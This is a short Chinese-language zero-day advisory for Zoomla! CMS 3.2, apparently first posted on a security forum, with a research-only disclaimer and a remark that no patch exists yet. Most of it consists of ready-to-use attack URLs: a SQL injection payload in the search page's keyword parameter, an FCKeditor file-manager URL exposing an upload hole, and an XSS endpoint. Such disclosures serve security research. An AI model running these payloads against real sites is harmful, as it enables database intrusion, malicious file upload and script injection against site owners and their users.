Zoomla!逐浪 CMS3.2 0day

北洋贱队（http://bbs.seceye.org）首发

测试版本：
Zoomla!逐浪CMS3.2 + mssql for Windows

描述：

Zoomla!逐浪CMS是功能强大的网站内核与管理系统,集成内容管理OASNS项目管理采集邮件订阅等强大功能,基于c#语言.net架构 开发,是目前中国唯一同步支持MSSQL与Oracle两大数据库的高端CMS,用于快速构建高效门户网站

测试方法：
——————————————————————————–
警 告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1.注入漏洞：

http://www.site.com/Search/SearchList.aspx?node=0&keyword=1%25′%20Or%20Db_NaMe()=0%20oR%20′%25′=’&type=1

2.FCKeditor上传漏洞

http://www.site.com/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.site.com%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx

3.XSS脚本跨站漏洞

http://www.site.com/prompt/correct.aspx?t=

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.zoomla.cn/